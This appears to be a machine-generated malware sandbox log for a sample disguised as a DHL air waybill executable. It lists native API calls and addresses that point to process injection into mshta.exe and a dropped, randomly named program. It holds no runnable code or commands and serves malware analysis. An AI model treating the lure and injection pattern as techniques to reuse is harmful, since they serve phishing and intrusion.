            Source: initial sampleStatic PE information: Filename: DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0042C2E3 NtClose,3_2_0042C2E3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42B60 NtClose,LdrInitializeThunk,3_2_01B42B60
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01B42DF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01B42C70
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B435C0 NtCreateMutant,LdrInitializeThunk,3_2_01B435C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B44340 NtSetContextThread,3_2_01B44340
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B44650 NtSuspendThread,3_2_01B44650
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42BA0 NtEnumerateValueKey,3_2_01B42BA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42B80 NtQueryInformationFile,3_2_01B42B80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42BF0 NtAllocateVirtualMemory,3_2_01B42BF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42BE0 NtQueryValueKey,3_2_01B42BE0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42AB0 NtWaitForSingleObject,3_2_01B42AB0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42AF0 NtWriteFile,3_2_01B42AF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42AD0 NtReadFile,3_2_01B42AD0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42DB0 NtEnumerateKey,3_2_01B42DB0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42DD0 NtDelayExecution,3_2_01B42DD0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42D30 NtUnmapViewOfSection,3_2_01B42D30
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42D10 NtMapViewOfSection,3_2_01B42D10
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42D00 NtSetInformationFile,3_2_01B42D00
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42CA0 NtQueryInformationToken,3_2_01B42CA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42CF0 NtOpenProcess,3_2_01B42CF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42CC0 NtQueryVirtualMemory,3_2_01B42CC0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42C00 NtQueryInformationProcess,3_2_01B42C00
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42C60 NtCreateKey,3_2_01B42C60
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42FB0 NtResumeThread,3_2_01B42FB0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42FA0 NtQuerySection,3_2_01B42FA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42F90 NtProtectVirtualMemory,3_2_01B42F90
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42FE0 NtCreateFile,3_2_01B42FE0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42F30 NtCreateSection,3_2_01B42F30
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42F60 NtCreateProcessEx,3_2_01B42F60
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42EA0 NtAdjustPrivilegesToken,3_2_01B42EA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42E80 NtReadVirtualMemory,3_2_01B42E80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42EE0 NtQueueApcThread,3_2_01B42EE0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42E30 NtWriteVirtualMemory,3_2_01B42E30
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B43090 NtSetValueKey,3_2_01B43090
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B43010 NtOpenDirectoryObject,3_2_01B43010
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B439B0 NtGetContextThread,3_2_01B439B0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B43D10 NtOpenProcessToken,3_2_01B43D10
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B43D70 NtOpenThread,3_2_01B43D70
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED4340 NtSetContextThread,LdrInitializeThunk,6_2_02ED4340
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED4650 NtSuspendThread,LdrInitializeThunk,6_2_02ED4650
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2AF0 NtWriteFile,LdrInitializeThunk,6_2_02ED2AF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2AD0 NtReadFile,LdrInitializeThunk,6_2_02ED2AD0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_02ED2BE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02ED2BF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02ED2BA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2B60 NtClose,LdrInitializeThunk,6_2_02ED2B60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_02ED2EE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_02ED2E80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2FE0 NtCreateFile,LdrInitializeThunk,6_2_02ED2FE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2FB0 NtResumeThread,LdrInitializeThunk,6_2_02ED2FB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2F30 NtCreateSection,LdrInitializeThunk,6_2_02ED2F30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_02ED2CA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2C60 NtCreateKey,LdrInitializeThunk,6_2_02ED2C60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02ED2C70
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02ED2DF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2DD0 NtDelayExecution,LdrInitializeThunk,6_2_02ED2DD0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_02ED2D30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_02ED2D10
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED35C0 NtCreateMutant,LdrInitializeThunk,6_2_02ED35C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED39B0 NtGetContextThread,LdrInitializeThunk,6_2_02ED39B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2AB0 NtWaitForSingleObject,6_2_02ED2AB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2B80 NtQueryInformationFile,6_2_02ED2B80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2EA0 NtAdjustPrivilegesToken,6_2_02ED2EA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2E30 NtWriteVirtualMemory,6_2_02ED2E30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2FA0 NtQuerySection,6_2_02ED2FA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2F90 NtProtectVirtualMemory,6_2_02ED2F90
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2F60 NtCreateProcessEx,6_2_02ED2F60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2CF0 NtOpenProcess,6_2_02ED2CF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2CC0 NtQueryVirtualMemory,6_2_02ED2CC0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2C00 NtQueryInformationProcess,6_2_02ED2C00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2DB0 NtEnumerateKey,6_2_02ED2DB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2D00 NtSetInformationFile,6_2_02ED2D00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED3090 NtSetValueKey,6_2_02ED3090
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED3010 NtOpenDirectoryObject,6_2_02ED3010
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED3D70 NtOpenThread,6_2_02ED3D70
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED3D10 NtOpenProcessToken,6_2_02ED3D10
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00548BF0 NtCreateFile,6_2_00548BF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00548D60 NtReadFile,6_2_00548D60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00548E50 NtDeleteFile,6_2_00548E50
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00548EF0 NtClose,6_2_00548EF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00549050 NtAllocateVirtualMemory,6_2_00549050
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_00C1D2A40_2_00C1D2A4
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_027972200_2_02797220
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_027900400_2_02790040
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_027900070_2_02790007
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_04D551100_2_04D55110
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B2A0A90_2_06B2A0A9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B26CF00_2_06B26CF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B266380_2_06B26638
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B266480_2_06B26648
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B287F80_2_06B287F8
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B262100_2_06B26210
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B262000_2_06B26200
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B221910_2_06B22191
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B231FF0_2_06B231FF
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B27E480_2_06B27E48
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B25DD80_2_06B25DD8
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_06B25DC80_2_06B25DC8
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_004183A33_2_004183A3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_004028A03_2_004028A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0040314B3_2_0040314B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_004031503_2_00403150
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0042E9133_2_0042E913
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_004011F03_2_004011F0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0040FC123_2_0040FC12
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0040FC133_2_0040FC13
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_004024A03_2_004024A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0041653C3_2_0041653C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_004165803_2_00416580
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_004165833_2_00416583
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0040FE333_2_0040FE33
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0040DEB33_2_0040DEB3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD01AA3_2_01BD01AA
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC41A23_2_01BC41A2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC81CC3_2_01BC81CC
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAA1183_2_01BAA118
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B001003_2_01B00100
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B981583_2_01B98158
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA20003_2_01BA2000
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1E3F03_2_01B1E3F0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD03E63_2_01BD03E6
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCA3523_2_01BCA352
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B902C03_2_01B902C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB02743_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD05913_2_01BD0591
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B105353_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBE4F63_2_01BBE4F6
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB44203_2_01BB4420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC24463_2_01BC2446
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0C7C03_2_01B0C7C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B107703_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B347503_2_01B34750
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2C6E03_2_01B2C6E0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A03_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BDA9A63_2_01BDA9A6
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B269623_2_01B26962
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF68B83_2_01AF68B8
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E8F03_2_01B3E8F0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1A8403_2_01B1A840
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B128403_2_01B12840
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC6BD73_2_01BC6BD7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCAB403_2_01BCAB40
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0EA803_2_01B0EA80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B28DBF3_2_01B28DBF
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0ADE03_2_01B0ADE0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BACD1F3_2_01BACD1F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1AD003_2_01B1AD00
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0CB53_2_01BB0CB5
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B00CF23_2_01B00CF2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10C003_2_01B10C00
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8EFA03_2_01B8EFA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1CFE03_2_01B1CFE0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B02FC83_2_01B02FC8
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B30F303_2_01B30F30
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB2F303_2_01BB2F30
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B52F283_2_01B52F28
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B84F403_2_01B84F40
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B22E903_2_01B22E90
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCCE933_2_01BCCE93
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCEEDB3_2_01BCEEDB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCEE263_2_01BCEE26
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10E593_2_01B10E59
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1B1B03_2_01B1B1B0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BDB16B3_2_01BDB16B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B4516C3_2_01B4516C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFF1723_2_01AFF172
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC70E93_2_01BC70E9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCF0E03_2_01BCF0E0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B170C03_2_01B170C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBF0CC3_2_01BBF0CC
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B5739A3_2_01B5739A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC132D3_2_01BC132D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFD34C3_2_01AFD34C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B152A03_2_01B152A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB12ED3_2_01BB12ED
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2B2C03_2_01B2B2C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAD5B03_2_01BAD5B0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD95C33_2_01BD95C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC75713_2_01BC7571
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCF43F3_2_01BCF43F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B014603_2_01B01460
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCF7B03_2_01BCF7B0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC16CC3_2_01BC16CC
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B556303_2_01B55630
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA59103_2_01BA5910
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B199503_2_01B19950
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2B9503_2_01B2B950
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B138E03_2_01B138E0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7D8003_2_01B7D800
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2FB803_2_01B2FB80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B85BF03_2_01B85BF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B4DBF93_2_01B4DBF9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCFB763_2_01BCFB76
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B55AA03_2_01B55AA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BADAAC3_2_01BADAAC
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB1AA33_2_01BB1AA3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBDAC63_2_01BBDAC6
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B83A6C3_2_01B83A6C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCFA493_2_01BCFA49
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC7A463_2_01BC7A46
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2FDC03_2_01B2FDC0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC7D733_2_01BC7D73
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC1D5A3_2_01BC1D5A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B13D403_2_01B13D40
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCFCF23_2_01BCFCF2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B89C323_2_01B89C32
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCFFB13_2_01BCFFB1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B11F923_2_01B11F92
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AD3FD53_2_01AD3FD5
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AD3FD23_2_01AD3FD2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCFF093_2_01BCFF09
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B19EB03_2_01B19EB0
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0343D3855_2_0343D385
